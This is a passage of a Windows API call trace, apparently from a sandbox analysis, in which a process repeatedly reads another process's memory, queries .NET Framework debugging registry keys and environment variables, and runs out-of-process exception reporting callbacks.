lpNumberOfBytesRead=0x4c1ec78190*=0x7c8) returned 1 [0078.914] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd410 [0078.914] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x400) returned 0x22b349be490 [0078.914] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a27b0 | out: hHeap=0x22b349a0000) returned 1 [0078.914] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95be30, lpBuffer=0x22b34ad0b70, nSize=0x198, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0b70*, lpNumberOfBytesRead=0x4c1ec78160*=0x198) returned 1 [0078.915] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd440 [0078.915] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x861390, lpBuffer=0x22b34ad0d30, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d30*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.915] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7690 [0078.915] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25b7668, lpBuffer=0x22b34ad0d60, nSize=0x94, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d60*, lpNumberOfBytesRead=0x4c1ec78190*=0x94) returned 1 [0078.915] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c74e0 [0078.915] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2a0, lpBuffer=0x22b34ad0e20, nSize=0x14, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0e20*, lpNumberOfBytesRead=0x4c1ec78190*=0x14) returned 1 [0078.915] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7060 [0078.915] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc12e8c978, lpBuffer=0x22b34ad0e60, nSize=0x40, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0e60*, lpNumberOfBytesRead=0x4c1ec78160*=0x40) returned 1 [0078.915] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c73c0 [0078.915] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2b0, lpBuffer=0x4c1ec783c0, nSize=0xd50, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec783c0*, lpNumberOfBytesRead=0x4c1ec78230*=0xd50) returned 1 [0078.915] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bd000, lpBuffer=0x4c1ec79110, nSize=0x8a0, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec79110*, lpNumberOfBytesRead=0x4c1ec78230*=0x8a0) returned 1 [0078.915] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb970 | out: hHeap=0x22b349a0000) returned 1 [0078.915] VirtualFree (lpAddress=0x22b34ad0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcff0 | out: hHeap=0x22b349a0000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd0b0 | out: hHeap=0x22b349a0000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd080 | out: hHeap=0x22b349a0000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd050 | out: hHeap=0x22b349a0000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd410 | out: hHeap=0x22b349a0000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd440 | out: hHeap=0x22b349a0000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bce10 | out: hHeap=0x22b349a0000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd320 | out: hHeap=0x22b349a0000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf00 | out: hHeap=0x22b349a0000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf60 | out: hHeap=0x22b349a0000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7690 | out: hHeap=0x22b349a0000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c74e0 | out: hHeap=0x22b349a0000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7060 | out: hHeap=0x22b349a0000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c73c0 | out: hHeap=0x22b349a0000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349be490 | out: hHeap=0x22b349a0000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bced0 | out: hHeap=0x22b349a0000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a17a0 | out: hHeap=0x22b349a0000) returned 1 [0078.916] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd020 | out: hHeap=0x22b349a0000) returned 1 [0078.916] OutOfProcessExceptionEventSignatureCallback () returned 0x0 [0078.916] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffc37f90000 [0078.916] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetProcessIdOfThread") returned 0x7ffc37faf030 [0078.916] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetThreadId") returned 0x7ffc37fae7c0 [0078.916] GetProcessIdOfThread (Thread=0x38c) returned 0x69c [0078.916] GetThreadId (Thread=0x38c) returned 0x8cc [0078.916] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bce10 [0078.916] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x18) returned 0x22b349bb550 [0078.916] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x160) returned 0x22b349a17a0 [0078.916] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd080 [0078.916] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x80) returned 0x22b349a27b0 [0078.917] GetEnvironmentVariableA (in: lpName="MSCORDACWKS_DEBUG", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.917] GetEnvironmentVariableW (in: lpName="COMPlus_DbgDACSkipVerifyDlls", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.918] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a50 | out: phkResult=0x4c1ec77a50*=0x0) returned 0x2 [0078.918] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a58 | out: phkResult=0x4c1ec77a58*=0x1fc) returned 0x0 [0078.918] RegQueryValueExW (in: hKey=0x1fc, lpValueName="DbgDACSkipVerifyDlls", lpReserved=0x0, lpType=0x4c1ec77ab8, lpData=0x4c1ec77a48, lpcbData=0x4c1ec77a40*=0x4 | out: lpType=0x4c1ec77ab8*=0x0, lpData=0x4c1ec77a48*=0x0, lpcbData=0x4c1ec77a40*=0x4) returned 0x2 [0078.918] RegCloseKey (hKey=0x1fc) returned 0x0 [0078.918] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x22b34ad0000 [0078.919] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570000, lpBuffer=0x22b34ad0030, nSize=0x40, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0030*, lpNumberOfBytesRead=0x4c1ec77c50*=0x40) returned 1 [0078.919] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd0b0 [0078.919] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570130, lpBuffer=0x22b34ad0090, nSize=0x108, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0090*, lpNumberOfBytesRead=0x4c1ec77c50*=0x108) returned 1 [0078.919] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd050 [0078.919] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc165701e8, lpBuffer=0x22b34ad01c0, nSize=0x8, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad01c0*, lpNumberOfBytesRead=0x4c1ec77c50*=0x8) returned 1 [0078.919] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd410 [0078.919] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16c76b2c, lpBuffer=0x22b34ad01f0, nSize=0x1c, lpNumberOfBytesRead=0x4c1ec77c80 | out: lpBuffer=0x22b34ad01f0*, lpNumberOfBytesRead=0x4c1ec77c80*=0x1c) returned 1 [0078.919] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd320 [0078.919] GetLastError () returned 0xcb [0078.919] SetLastError (dwErrCode=0xcb) [0078.919] GetLastError () returned 0xcb [0078.919] SetLastError (dwErrCode=0xcb) [0078.919] GetLastError () returned 0xcb [0078.919] SetLastError (dwErrCode=0xcb) [0078.919] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16ea93a8, lpBuffer=0x22b34ad0230, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0230*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.920] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd440 [0078.920] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934000, lpBuffer=0x22b34ad0260, nSize=0x98, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0260*, lpNumberOfBytesRead=0x4c1ec781a0*=0x98) returned 1 [0078.920] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bced0 [0078.920] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934040, lpBuffer=0x22b34ad0320, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0320*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.920] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf00 [0078.920] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e400, lpBuffer=0x22b34ad0350, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0350*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.920] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf60 [0078.920] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x4c1ec78288, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x4c1ec78288*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.920] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x22b34ad0380, nSize=0x7c8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0380*, lpNumberOfBytesRead=0x4c1ec78190*=0x7c8) returned 1 [0078.920] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcff0 [0078.920] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x400) returned 0x22b349be490 [0078.920] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a27b0 | out: hHeap=0x22b349a0000) returned 1 [0078.920] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95be30, lpBuffer=0x22b34ad0b70, nSize=0x198, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0b70*, lpNumberOfBytesRead=0x4c1ec78160*=0x198) returned 1 [0078.920] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd020 [0078.920] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x861390, lpBuffer=0x22b34ad0d30, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d30*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.920] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c6f70 [0078.920] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25b7668, lpBuffer=0x22b34ad0d60, nSize=0x94, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d60*, lpNumberOfBytesRead=0x4c1ec78190*=0x94) returned 1 [0078.921] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7420 [0078.921] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2a0, lpBuffer=0x22b34ad0e20, nSize=0x14, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0e20*, lpNumberOfBytesRead=0x4c1ec78190*=0x14) returned 1 [0078.921] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7000 [0078.921] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc12e8c978, lpBuffer=0x22b34ad0e60, nSize=0x40, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0e60*, lpNumberOfBytesRead=0x4c1ec78160*=0x40) returned 1 [0078.921] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7030 [0078.921] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2b0, lpBuffer=0x4c1ec783c0, nSize=0xd50, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec783c0*, lpNumberOfBytesRead=0x4c1ec78230*=0xd50) returned 1 [0078.921] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bd000, lpBuffer=0x4c1ec79110, nSize=0x8a0, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec79110*, lpNumberOfBytesRead=0x4c1ec78230*=0x8a0) returned 1 [0078.921] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb550 | out: hHeap=0x22b349a0000) returned 1 [0078.921] VirtualFree (lpAddress=0x22b34ad0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.921] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bced0 | out: hHeap=0x22b349a0000) returned 1 [0078.921] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf60 | out: hHeap=0x22b349a0000) returned 1 [0078.921] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd0b0 | out: hHeap=0x22b349a0000) returned 1 [0078.921] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf00 | out: hHeap=0x22b349a0000) returned 1 [0078.921] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcff0 | out: hHeap=0x22b349a0000) returned 1 [0078.922] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd020 | out: hHeap=0x22b349a0000) returned 1 [0078.922] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd050 | out: hHeap=0x22b349a0000) returned 1 [0078.922] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd410 | out: hHeap=0x22b349a0000) returned 1 [0078.922] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd440 | out: hHeap=0x22b349a0000) returned 1 [0078.922] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd320 | out: hHeap=0x22b349a0000) returned 1 [0078.922] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c6f70 | out: hHeap=0x22b349a0000) returned 1 [0078.922] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7420 | out: hHeap=0x22b349a0000) returned 1 [0078.922] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7000 | out: hHeap=0x22b349a0000) returned 1 [0078.922] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7030 | out: hHeap=0x22b349a0000) returned 1 [0078.922] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349be490 | out: hHeap=0x22b349a0000) returned 1 [0078.922] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd080 | out: hHeap=0x22b349a0000) returned 1 [0078.922] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a17a0 | out: hHeap=0x22b349a0000) returned 1 [0078.922] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bce10 | out: hHeap=0x22b349a0000) returned 1 [0078.922] OutOfProcessExceptionEventSignatureCallback () returned 0x0 [0078.922] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffc37f90000 [0078.922] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetProcessIdOfThread") returned 0x7ffc37faf030 [0078.922] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetThreadId") returned 0x7ffc37fae7c0 [0078.922] GetProcessIdOfThread (Thread=0x38c) returned 0x69c [0078.922] GetThreadId (Thread=0x38c) returned 0x8cc [0078.922] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd320 [0078.922] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x18) returned 0x22b349bb8b0 [0078.922] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x160) returned 0x22b349a17a0 [0078.922] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd410 [0078.922] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x80) returned 0x22b349a27b0 [0078.922] GetEnvironmentVariableA (in: lpName="MSCORDACWKS_DEBUG", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.922] GetEnvironmentVariableW (in: lpName="COMPlus_DbgDACSkipVerifyDlls", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.922] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a50 | out: phkResult=0x4c1ec77a50*=0x0) returned 0x2 [0078.923] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a58 | out: phkResult=0x4c1ec77a58*=0x1fc) returned 0x0 [0078.923] RegQueryValueExW (in: hKey=0x1fc, lpValueName="DbgDACSkipVerifyDlls", lpReserved=0x0, lpType=0x4c1ec77ab8, lpData=0x4c1ec77a48, lpcbData=0x4c1ec77a40*=0x4 | out: lpType=0x4c1ec77ab8*=0x0, lpData=0x4c1ec77a48*=0x0, lpcbData=0x4c1ec77a40*=0x4) returned 0x2 [0078.923] RegCloseKey (hKey=0x1fc) returned 0x0 [0078.923] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x22b34ad0000 [0078.923] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570000, lpBuffer=0x22b34ad0030, nSize=0x40, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0030*, lpNumberOfBytesRead=0x4c1ec77c50*=0x40) returned 1 [0078.923] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd440 [0078.923] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570130, lpBuffer=0x22b34ad0090, nSize=0x108, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0090*, lpNumberOfBytesRead=0x4c1ec77c50*=0x108) returned 1 [0078.923] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bce10 [0078.923] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc165701e8, lpBuffer=0x22b34ad01c0, nSize=0x8, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad01c0*, lpNumberOfBytesRead=0x4c1ec77c50*=0x8) returned 1 [0078.923] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd0b0 [0078.923] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16c76b2c, lpBuffer=0x22b34ad01f0, nSize=0x1c, lpNumberOfBytesRead=0x4c1ec77c80 | out: lpBuffer=0x22b34ad01f0*, lpNumberOfBytesRead=0x4c1ec77c80*=0x1c) returned 1 [0078.923] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd050 [0078.923] GetLastError () returned 0xcb [0078.923] SetLastError (dwErrCode=0xcb) [0078.923] GetLastError () returned 0xcb [0078.924] SetLastError (dwErrCode=0xcb) [0078.924] GetLastError () returned 0xcb [0078.924] SetLastError (dwErrCode=0xcb) [0078.924] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16ea93a8, lpBuffer=0x22b34ad0230, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0230*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.924] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bced0 [0078.924] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934000, lpBuffer=0x22b34ad0260, nSize=0x98, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0260*, lpNumberOfBytesRead=0x4c1ec781a0*=0x98) returned 1 [0078.924] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf00 [0078.924] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934040, lpBuffer=0x22b34ad0320, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0320*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.924] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf60 [0078.924] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e400, lpBuffer=0x22b34ad0350, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0350*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.924] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcff0 [0078.924] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x4c1ec78288, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x4c1ec78288*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.924] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x22b34ad0380, nSize=0x7c8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0380*, lpNumberOfBytesRead=0x4c1ec78190*=0x7c8) returned 1 [0078.924] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd020 [0078.924] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x400) returned 0x22b349be490 [0078.924] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a27b0 | out: hHeap=0x22b349a0000) returned 1 [0078.925] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95be30, lpBuffer=0x22b34ad0b70, nSize=0x198, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0b70*, lpNumberOfBytesRead=0x4c1ec78160*=0x198) returned 1 [0078.925] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd080 [0078.925] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x861390, lpBuffer=0x22b34ad0d30, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d30*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.925] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7360 [0078.925] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25b7668, lpBuffer=0x22b34ad0d60, nSize=0x94, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d60*, lpNumberOfBytesRead=0x4c1ec78190*=0x94) returned 1 [0078.925] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7420 [0078.925] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2a0, lpBuffer=0x22b34ad0e20, nSize=0x14, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0e20*, lpNumberOfBytesRead=0x4c1ec78190*=0x14) returned 1 [0078.925] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7450 [0078.925] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc12e8c978, lpBuffer=0x22b34ad0e60, nSize=0x40, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0e60*, lpNumberOfBytesRead=0x4c1ec78160*=0x40) returned 1 [0078.925] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7540 [0078.925] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2b0, lpBuffer=0x4c1ec783c0, nSize=0xd50, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec783c0*, lpNumberOfBytesRead=0x4c1ec78230*=0xd50) returned 1 [0078.925] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bd000, lpBuffer=0x4c1ec79110, nSize=0x8a0, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec79110*, lpNumberOfBytesRead=0x4c1ec78230*=0x8a0) returned 1 [0078.925] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb8b0 | out: hHeap=0x22b349a0000) returned 1 [0078.925] VirtualFree (lpAddress=0x22b34ad0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.926] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf00 | out: hHeap=0x22b349a0000) returned 1 [0078.926] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcff0 | out: hHeap=0x22b349a0000) returned 1 [0078.926] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd440 | out: hHeap=0x22b349a0000) returned 1 [0078.926] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf60 | out: hHeap=0x22b349a0000) returned 1 [0078.926] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd020 | out: hHeap=0x22b349a0000) returned 1 [0078.926] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd080 | out: hHeap=0x22b349a0000) returned 1 [0078.926] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bce10 | out: hHeap=0x22b349a0000) returned 1 [0078.926] HeapFree (in: 